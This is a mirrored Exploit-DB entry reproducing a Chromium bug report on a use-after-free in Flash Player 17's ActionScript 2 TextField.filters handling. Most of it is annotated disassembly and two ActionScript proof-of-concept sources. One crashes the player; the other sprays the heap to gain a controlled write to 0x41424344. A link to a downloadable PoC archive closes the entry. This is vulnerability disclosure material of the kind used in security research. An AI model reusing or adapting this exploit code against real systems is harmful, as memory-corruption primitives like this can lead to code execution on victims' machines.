bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/37848.txt
Offensive Security ed0e1e4d44 DB: 2018-09-25 
1979 changes to exploits/shellcodes

Couchdb 1.5.0 - 'uuids' Denial of Service
Apache CouchDB 1.5.0 - 'uuids' Denial of Service

Beyond Remote 2.2.5.3 - Denial of Service (PoC)
udisks2 2.8.0 - Denial of Service (PoC)
Termite 3.4 - Denial of Service (PoC)
SoftX FTP Client 3.3 - Denial of Service (PoC)

Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection
SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection

Silverstripe CMS 3.0.2 - Multiple Vulnerabilities
SilverStripe CMS 3.0.2 - Multiple Vulnerabilities

Silverstripe CMS 2.4 - File Renaming Security Bypass
SilverStripe CMS 2.4 - File Renaming Security Bypass

Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities
SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities

Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection
SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection

Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload
SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload

Silverstripe CMS 2.4.x - 'BackURL' Open Redirection
SilverStripe CMS 2.4.x - 'BackURL' Open Redirection

Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure
SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure

Silverstripe CMS - Multiple HTML Injection Vulnerabilities
SilverStripe CMS - Multiple HTML Injection Vulnerabilities

Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation

Monstra CMS before 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (2)

Monstra CMS < 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (1)
Navigate CMS 2.8 - Cross-Site Scripting
Collectric CMU 1.0 - 'lang' SQL injection
Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection
LG SuperSign EZ CMS 2.5 - Remote Code Execution
MyBB Visual Editor 1.8.18 - Cross-Site Scripting
Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection
Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection
RICOH Aficio MP 301 Printer - Cross-Site Scripting
Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection
RICOH MP C6003 Printer - Cross-Site Scripting

Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)
Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
2018-09-25 05:01:51 +00:00

142 lines
No EOL
4.9 KiB
Text
Raw Blame History

Source: https://code.google.com/p/google-security-research/issues/detail?id=342&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for https://code.google.com/p/chromium/issues/detail?id=480496]
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
---
VULNERABILITY DETAILS
A little bug while setting the TextFilter.filters array.
Chrome 42.0.2311.90 with Flash 17.0.0.169
VERSION
Chrome Version: 42.0.2311.90 Stable with Flash 17.0.0.169
Operating System: [Win 7 SP1]
REPRODUCTION CASE
We can set the TextFilter.filters array with either an array or a custom object. Providing an object allows an attacker to execute AS2 code in the following loop (these lines come from flashplayer17_sa.exe 17.0.0.169):
.text:004D6964 loc_4D6964:
.text:004D6964 and eax, 0FFFFFFF8h
.text:004D6967 push edi
.text:004D6968 mov edi, eax
.text:004D696A mov ecx, edi
.text:004D696C xor esi, esi
.text:004D696E call xAS2_getArrayLength ; here we can override object.length and execute some code
.text:004D6973 test eax, eax ; if that code frees the object pointed by ebx...
.text:004D6975 jle short loc_4D69A3
.text:004D6977
.text:004D6977 loc_4D6977:
.text:004D6977 push edi
.text:004D6978 mov ecx, esi
.text:004D697A call sub_4D3FE0 ; get an item from the object
.text:004D697F add esp, 4
.text:004D6982 test eax, eax ; we have either a filter or 0 here
.text:004D6984 jz short loc_4D6997
.text:004D6986 mov edx, [eax]
.text:004D6988 mov ecx, eax
.text:004D698A mov eax, [edx+18h]
.text:004D698D call eax
.text:004D698F push eax
.text:004D6990 mov ecx, ebx ; ...we get a use after free here
.text:004D6992 call sub_4CDB70 ; and a write-4 condition here
.text:004D6997
.text:004D6997 loc_4D6997:
.text:004D6997 mov ecx, edi
.text:004D6999 inc esi
.text:004D699A call xAS2_getArrayLength
.text:004D699F cmp esi, eax
.text:004D69A1 jl short loc_4D6977
Freeing the object pointed by ebx is easy indeed:
var tfield:TextField = createTextField("tf",1,1,2,3,4) //create a TextField at depth 1
tfield.filters = [] //create the targeted object
createTextField("textf",1,1,2,3,4) //create again a TextField (or any other DisplayObject) at the same depth and Flash frees the targeted object
flash_as2_filters_uaf_write4_poc.swf just crashes the program and flash_as2_filters_uaf_write4.swf crashes while writing to 0x41424344
***************************************************************************
Content of flash_as2_filters_uaf_write4_poc.fla
//Compile that with Flash CS5.5 and change the property "s" in the swf to "3"
//It's because Flash CS5.5 does not allow naming a property with a numeral
import flash.filters.GlowFilter;
var tfield:TextField = createTextField("tf",1,1,2,3,4)
function f() {
_global.mc.createTextField("tf",1,1,2,3,4)
}
_global.mc = this
_global.counter = 0
var oCounter:Object = new Object()
oCounter.valueOf = function () {
_global.counter += 1
if (_global.counter == 1) f()
return 10;
}
var o = {length:oCounter, 3:new GlowFilter(1,2,3,4,5,6,true,true)}
tfield.filters = o
***************************************************************************
Content of flash_as2_filters_uaf_write4.fla
//Compile that with Flash CS5.5 and change the property "s" in the swf to "3"
//It's because Flash CS5.5 does not allow naming a property with a numeral
import flash.filters.GlowFilter;
var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x3F8/4;i++) {
a2[i] = 0x41424344
}
a2[3] = 0
a2[0x324/4] = 0x41414100
a2[0x324/4 + 1] = 0x41424344
a2[0x324/4 + 2] = 0x41414143
a2[0x324/4 + 3] = 0x41414100
for (var i = 0; i<0x200;i++) {
var tf:TextFormat = new TextFormat()
a1[i] = tf
}
for (var i = 0; i<0x100;i++) {
a1[i].tabStops = a2
}
var tfield:TextField = createTextField("tf",1,1,2,3,4)
function f() {
_global.mc.createTextField("tf",1,1,2,3,4)
for (var i = 0x100; i<0x200;i++) {
_global.a1[i].tabStops = _global.a2
}
}
_global.mc = this
_global.counter = 0
_global.a1 = a1
_global.a2 = a2
var oCounter:Object = new Object()
oCounter.valueOf = function () {
_global.counter += 1
if (_global.counter == 1) f()
return 10;
}
var o = {length:oCounter, s:new GlowFilter(1,2,3,4,5,6,true,true)}
tfield.filters = o
---
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37848.zip
Reference in a new issue View git blame Copy permalink